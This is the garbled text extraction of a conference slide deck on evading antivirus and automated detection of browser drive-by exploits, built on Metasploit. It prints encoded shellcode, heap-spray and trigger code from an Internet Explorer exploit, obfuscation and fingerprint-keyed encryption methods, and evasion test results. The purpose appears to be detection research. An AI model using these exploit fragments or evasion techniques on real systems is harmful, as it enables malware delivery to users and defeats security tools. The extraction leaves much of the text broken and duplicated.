Documenti di Didattica
Documenti di Professioni
Documenti di Cultura
CIRCUMVENTING
AUTOMATED AND
MANUAL DETECTION
OF BROWSER EXPLOITS
Wayne Huang, Cofounder & CTO
Fyodor Yarochkin
Antonio Rohman Fernandez
Chris Hsiao
Armorize Technologies, Inc.
@waynehuang
wayne@armorize.com
@
i
Drive-by-Download Explained
Hackers distribute malware by
"poisoning" legitimate websites
Typical: injects malicious iframes
into HTML content
Drive-by-Download Explained
Affected websites:
Essentially becomes a delivery mechanism for
malware
Appear normal
Victims
Do not need to "click" or "agree to" anything
Simply connecting to the website executes the
attack
CNN
GameSpot
US Treasury
http://thompson.blog.avg.com/2010/05/treasurywebsitehacked.html
PlayStation.com
Washington Post
Page+Browser
Page
+ Browser
Exploit
Payload=
d
downloader
l d
12
ExploitServer
Page+Browser
Page
+ Browser
Exploit
Payload=
d
downloader
l d
ExploitServer
<script>var sc=unescape("
%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805
%uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2
%u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053
%ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8
Exploit!
Page+Browser
Page
+ Browser
Exploit
Payload=
d
downloader
l d
ExploitServer
<script>var sc=unescape("
%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805
%uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2
%u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053
%ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8
Exploit!
Exploits / droppers
Exploits/droppers
Dropperexecutes
ExploitServer
15
Exploits / droppers
Exploits/droppers
ExploitServer
Malware
MalwareServer
16
Exploits / droppers
Exploits/droppers
ExploitServer
Malware
MalwareServer
Controller
17
Butwhowouldvisit?
But
who would visit?
ThekeynowisTRAFFIC
Exploits / droppers
Exploits/droppers
ExploitServer
Malware
MalwareServer
Controller
18
URLGenerators
Landing Site
LandingSite
Exploits / droppers
Exploits/droppers
ExploitServer
Malware
MalwareServer
Controller
19
URLGenerators
Landing Site
LandingSite
May-Ongoing:
ay O go Exploits/droppers
g / DNF666
ass SQ
SQL
Exploits
droppers 666 mass
injections
ExploitServer
May-June: Shared
hosting compromise,
Malware
GoDaddy RackSpace,
GoDaddy,
RackSpace Network
Solutions, BlueHost, DreamHost
MalwareServer
Continuous targeted
attacks
20
URLGenerators
Landing Site
LandingSite
ExploitServer
MalwareServer
(2) Man-in-the-Middle
WAN
URLGenerators
LAN
Landing Site
LandingSite
No tampering
p Exploits/droppers
g of
website
Exploits
/ droppers
LAN: ARP spoofing via ZXARPS
and other
ExploitServer
tools
Malware
22
LIVE DEMO 1
http://digg.com/software/
Internet_Storm_Center
Internet_Storm_Center_
_
_
_
Diary_2010_02_27
23
Injectedjavascript indigg.com
MOTIVATION
We p
provide solutions that monitors
websites and detect malicious
contents
t t 24
24x7
7
We use multiple
p behavior-,, heuristic-,,
and signature-based technologies
27
MOTIVATION
Most technologies are developed on
our own, BUT,
We also integrate anti-virus, whose
licenses are
$expensive$
28
MOTIVATION
We spend a lot of time testing our own
technologies, and selecting anti-virus
t h l gi
technologies
The key is: how good are we (and them) at
detecting NEW drive-by downloads
29
MOTIVATION
We need a g
good framework to help
p us
replicate, manipulate, and mutate
exploits found in the wild
--into NEW derivatives
30
DRIVESPLOIT
IS BORN
ON TOP OF
METASPLOIT
31
INITIAL FINDINGS
ANTIVIRUS CAPABILITIES
DIFFER GREATLY!
DESKTOP AND API VERSIONS
DIFFER GREATLY IN PERFORMANCE
COST != PERFORMANCE
URLGenerators
Landing Site
LandingSite
Exploits / droppers
Exploits/droppers
ExploitServer
Malware
MalwareServer
Controller
33
JAVASCRIPT
URLGenerators
Exploits / droppers
Exploits/droppers
Landing Site
LandingSite
JAVASCRIPT
JAVASCRIPT
ExploitServer
Malware
PE BINARY
PEBINARY
MalwareServer
Controller
34
JAVASCRIPT
URLGenerators
Exploits / droppers
Exploits/droppers
Landing Site
LandingSite
JAVASCRIPT
JAVASCRIPT
ExploitServer
Malware
PE BINARY
PEBINARY
MalwareServer
Controller
35
Wewilldetect
We
will detect
thispart!!
36
THE TAO:
ECMA SCRIPTS
ECMA-SCRIPTS
JAVASCRIPT
VBSCRIPT
ADOBE JS
ACTIONSCRIPT
37
JAVASCRIPT!! (ECMA-SCRIPT)
URLGenerators
Landing Site
LandingSite
Exploits / droppers
Exploits/droppers
ExploitServer
Malware
MalwareServer
Controller
38
JAVASCRIPT!! (ECMA-SCRIPT)
URLGenerators
Landing Site
LandingSite
Exploits / droppers
Exploits/droppers
ExploitServer
Malware
Controller
39
JAVASCRIPT!! (ECMA-SCRIPT)
URLGenerators
Landing Site
LandingSite
Exploits / droppers
Exploits/droppers
ExploitServer
Controller
40
JAVASCRIPT!! (ECMA-SCRIPT)
URLGenerators
Landing Site
LandingSite
Exploits / droppers
Exploits/droppers
ExploitServer
(METASPLOT)
Controller
41
JAVASCRIPT!! (ECMA-SCRIPT)
URLGenerators
Landing Site
LandingSite
Exploits / droppers
Exploits/droppers
PAYLOAD
ExploitServer
(METASPLOT)
meterpreter
(memory
injection)
Controller
42
Drive-By wants to
Avoid detection at the victim's
desktop
Avoid detection by UTM/gateways
Avoid detection
b automated
by
t
t d
monitors
Live for as long
as possible
ibl
Drive-By wants to
CONCLUSION:
Reduce exposure:
Serve SELECTIVELY
Avoid detection and analysis:
Mutate well
Serve Selectively
HTTP LEVEL:
Serve only to:
Fresh IPs (serve once per IP)
set HTTP::client::onlyonce true
Black list
SCRIPT MUTATION
For exploit
F payload
For
l d
46
Shellcode
MCorrupt
Heapspray
Trigger
gg
Shellcode
MCorrupt
Heapspray
Trigger
gg
<script>var shellraw =
"%u7679%u4673%u757b%u924e%u
66b9%ub441%u018d%u7df9%u241
c%ud631%u40b7%ueb11%u043d%u
be97%u212c%u05e1%u8335%u42fc
%ub893%u227f%u98d4%u484b%u8
c90%u13e0%uf8d3%u7aba%u7278
%u2034%u49f5%u259f%u9137%u3
39b%u1dd5%ub1b0%u3f99%u2f43
%u3cb6%ub2a8%ub30c%u4714%u3
d7b% 138% f803% 66b2% 97b9
d7b%ue138%uf803%u66b2%u97b9
%u9335%u767a%ub805%ue201%u4
a2f%u85a8%u7eeb%uf93b%u414f%
u257d%u78bf%u2c43%u7f99%ubb2
d%ub098%ub342%u918d%u3fb2%u
704a%u7147%u7f74%u3073%u77f9
%ubb40
Shellcode
MCorrupt
var j_object =
document.createElement('body');
j_object.addBehavior('#default#user
Data');
document.appendChild(j_object);
Heapspray
Trigger
gg
try{
for(counter=0;counter<10;
counter++){
t
){
j_object.setAttribute('s',window);}
}
catch(e){ }window status+ '';}
catch(e){}window.status+=
;}
Shellcode
BufferOvf
slackspace =0x86000
(shellcode.length*2);
var nops =
unescape("%u0c0c%u0c0c");
Heapspray
Trigger
gg
while(nops.length<slackspace/2){
nops+=nops;}var
} fillblock
fillbl k =
nops.substring(0,slackspace/2);
deletenops;
for(counter=0;counter<270;
counter++){memory[counter]=
fillblock +fillblock
+ fillblock +shellcode;
+ shellcode;
Shellcode
MCorrupt
Heapspray
Trigger
gg
<buttonid
<button
id='jj_id
id'
onclick='bootstrapper();'
style='display:none'></butt
on>
document.getElementById(
'j_id').onclick();
Shellcode
MCorrupt
OBFUSCATED
BLOB
Heapspray
Trigger
gg
DE
OBFUSCATOR
Primitive
F
Form
Obfuscated
F
Form
Exploit!
Page+Browser
Page
+ Browser
Exploit
Payload=
d
downloader
l d
ExploitServer
<script>var sc=unescape("
%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805
%uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2
%u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053
%ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8
Shellcode
MCorrupt
OBFUSCATED
BLOB
Heapspray
Start
Trigger
gg
DE
OBFUSCATOR
Primitive
F
Form
Obfuscated
F
Form
Shellcode
MCorrupt
Heapspray
Start
OBFUSCATED
BLOB
Mutate
Trigger
gg
DE
OBFUSCATOR
Primitive
F
Form
Obfuscated
F
Form
Shellcode
MCorrupt
Heapspray
Start
OBFUSCATED
BLOB
Mutate
Trigger
gg
DE
OBFUSCATOR
Primitive
F
Form
Obfuscated
Prevent
F
Form
MUTATION FEATURES
IMPLEMENTED
SO FAR
=
=
=
=
=
=
"%u7";
"679%";
679% ;
"u4673%";
"u75";
u75 ;
"7%u92";
"4e";
A3
A4
A1
A5
A2
A6
=
=
=
=
=
=
"u4673%";
"u75";
u75 ;
"%u7";
"7%u92";
7%u92 ;
"679%";
"4e";
B1 = A1+A2;
B2 = A3+A4;;
B3 = A5+A6;
Layer
ay 2
A3
A4
A1
A5
A2
A6
=
=
=
=
=
=
"u4673%";
"u75";
u75 ;
"%u7";
"7%u92";
7%u92 ;
"679%";
"4e";
B1 = A1+A2;
B2 = A3+A4;;
B3 = A5+A6;
B2 = A1+A2;
B3 = A5+A6;;
B1 = A3+A4;
( 6 ) (56 6 96) (3
) 8 (333
)
(246*2)+(5676*96)+(34*4)+8+(3332*1)
Trigger Prevention
Shellcode
MCorrupt
OBFUSCATED
BLOB
Heapspray
Start
Trigger
gg
DE
OBFUSCATOR
Primitive
F
Form
Obfuscated
Prevent
F
Form
Trigger prevention
<div onload
<img onload
var a=1; var b=0;
do {
useless code;
} while (a
(a==b);
b);
Fingerprinting-based encryption
TESTING IT OUT
UsingtheIEpeersexploitasexample
CVE20100806
(MS10018)
PLAIN: 17/42
RANDVAR+CONCAT SC+INJECT SC
11/42
ROUGHLY 6/17
ANTI VIRUS
ANTI-VIRUS
DETECTS BASED ON
SHELLCODE
(FOR THIS EXPLOIT)
RANDVAR+INJECT SC+CONCAT
CODE: 0/42
ANTIVIRUS
DESKTOP VERSION
IS MUCH STRONGER
Behavior analysis
Buffer overflow behavior
Download-to-file
Download to file behavior
To
Ag
Sc
Aa
Ky
To
Ag
Sc Aa
Ky
LIVE DEMO 2
DESKTOP
ANTIVIRUS
BYPASS
5. FINGERPRINTINGBASED ENCRYPTION
88
89
90
91
92
FF
Safari
Opera
Chrome
True
True
True
False
True
String_prototype_replace_ignore_functions
False
False
True(2.0.2)
False
False
Is_ES5_strict_mode_supported
False
False
False
False
False
False
True
True
True
True
Getelementsbytagname_returns_comment_nodes
True
False
False
False
False
Is_element_tagname_uppercased
True
True
True
True
True
Is_canvas_element_supported
False
True
True
True
True
Is_DOMFocusIn_supported
False
False
True
True
True
Is_CSS_boder_radius_supported
False
True
True
False
True
Function_identified_leaks_onto_enclosing_scope
True
False
False
False
False
Script_element_rejects_textnode_appending
True
False
False
False
False
Is_contextmenu_event_supported
True
True
True
False
True
Is_position_fixed_supported
False
True
True
False
True
Computed_style_return_static_positioned_element
False
False
False
True
False
93
5. Fingerprinting-Based Encryption
Summary
"This
This exploit works only for IE6
IE6"
"Give me an encrypted version of my
j
javascript
i t exploit
l it
"Give me javascript to generate the
decoding key"
y is only
y correctly
y generated
g
if the
"The key
javascript is run under IE6"
94
5. Fingerprinting-Based Encryption
Summary
A=Check1();
B=Check3();
C=Check4();
D Check6();
D=Check6();
E=Check8();
F=Check9();
();
G=Check12();
H=Check14();
95
5. Fingerprinting-Based Encryption
Summary
A=Check1();
A=Check6();
B=Check3();
B=Check12();
C=Check4();
C=Check8();
D=Check6();
D
Check6();
D=Check1();
D
Check1();
E=Check8();
E=Check4();
F=Check9();
();
F=Check14();
();
G=Check12();
G=Check3();
H=Check14();
H=Check9();
96
5. Fingerprinting-Based Encryption
Summary
A=Check1();
A=Check6();
B=Check3();
B=Check12();
C=Check4();
C=Check8();
D=Check6();
D
Check6();
D=Check1();
D
Check1();
E=Check8();
E=Check4();
F=Check9();
();
F=Check14();
();
G=Check12();
G=Check3();
H=Check14();
H=Check9();
97
Onetimekey
Encrypt
javascript
exploit
l
Generate
decoding
javascript
98
99
100
youdon'tusuallyreusethem
http://code.google.com/closure/compiler/
http //code google com/clos e/compile /
http://www.creabit.com/htmlprotect/
Dean
D
Edwards
Ed
d Packer
P k
http://dean.edwards.name/packer/
Online JS Obfuscator
http://www.iwebtool.com/html_encrypter
http://www.cha88.cn/safe/fromCharCode.php
101
OK so AV doesn
doesntt work (that well)
well)
How about behavior-based approaches?
102
Exploits in VBScript
URL generators in VBScript
Exploits in / generated by VBScript
May defeat SpiderMonkey et al (Rhino,
JSunPack, etc)
104
Future Work
Randomly chop up scripts and split into
individual
d d l ffiles
l
g VBscript
p instead of jjavascript
p
Generating
Encrypting
using data
existing
outside of
HTML
HTTP headers
Discussion
The Panopticlick
p
experiment
p
by
y
Eckersley of EFF
94.2% of "typical
yp
desktop
p browsers are unique
q
THANK YOU!
wayne@armorize.com
@waynehuang
@drivesploit
http://www drivesploit org
http://www.drivesploit.org
Credits: wayne huang,
g fyodor yarochkin,
antonio rohman fernandez
References
James Lee, Using guided missles in drive-bys
http://www.slideshare.net/egypt/using
http://www
slideshare net/egypt/using-guided-missiles-inguided missiles in
drivebys-automatic-browser-fingerprinting-and-exploitation-withthe-metasploit-frameworks-browser-autopwn
http://www.slideshare.net/wayne_armorize/0-box-analyzerafterdark-runtime-forensics-for-automated-malware-analysis-andft d k
ti
f
i f
t
t d
l
l i
d
clustering-2
http://blog.metasploit.com/2007/04/heaplib-support-added-tohttp://blog
metasploit com/2007/04/heaplib support added to
metasploit-3.html